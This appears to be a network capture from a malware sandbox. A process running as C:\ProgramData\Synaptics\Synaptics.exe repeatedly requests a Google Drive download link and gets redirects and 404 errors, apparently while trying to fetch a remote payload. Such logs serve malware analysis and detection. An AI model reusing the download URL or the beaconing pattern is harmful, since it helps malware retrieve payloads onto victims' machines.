                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-fPNvZmSzqJwC7wCjYeQNSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    111 | 192.168.2.4 | 49908 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6fptvrk1rvcYhu9jn_A5I3uskYgEv56SDRQsBG9qB8z09MvacwwCAFBmhWyas9wo9K
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Isq4iJRQMKS29y9Gs5d_yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="OYdzE8H5gTWGzbgvRT7Amg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    112 | 192.168.2.4 | 49909 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7bJ4bfnRhBPw_5gdvkn38o9n-HGASA01bBjYi9cjCIaeYr6GIFmYrE8kWYBt8F8qCJ
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:39 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-O9mM0oBOnTbNGYipsUvkVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="1nQN_v4YCHmLYlVdyjVAXw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:39 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    113 | 192.168.2.4 | 49912 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KM_Bh2_Zvx7DhiGkXADR_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    114 | 192.168.2.4 | 49913 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-zCTv6LKvERgIL3Jafz1nuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    115 | 192.168.2.4 | 49914 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:40 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC7Zxc7tYAlHhm3Sl77wooeKkIH811kdZ9aOsB6hjMeCyxw-L5qs44kL-oQo3zyXE2cMx5lRBc4
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-j_LKLvuLRj2wyuyAUeO4VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:40 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:40 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="93kKKwCTzpIUR9hqmmGgxw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:40 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
116 | 192.168.2.4 | 49915 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:40 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:40 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC482Q6VrHTYGQ-osPbIpHMT_R9Ji_mfmQzjEyT4jKQEmC_X8p7dzHgHgDYhbPigdfGfTFvT4zs
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:40 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ow8qcLUkI1nnVjHb151auw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:40 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 03:59:40 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="7ihWK2Xnjy8Gkx9FG3BaWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 03:59:40 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
117 | 192.168.2.4 | 49916 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o55lWXv6dPVghJcuYeIkIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
118 | 192.168.2.4 | 49917 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:41 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:41 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Zv3fG-Ql4o8jc2_FDMR4Ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
119 | 192.168.2.4 | 49918 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:41 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:41 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4kL-iL-oTdn4qTI2omROexovcwtBgGLqnkwBpQcc3WmZIPk8V1r52lVFeoCdfccpTD
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:41 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-gVpoI4Tv-OnyM5LOkA2eFA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
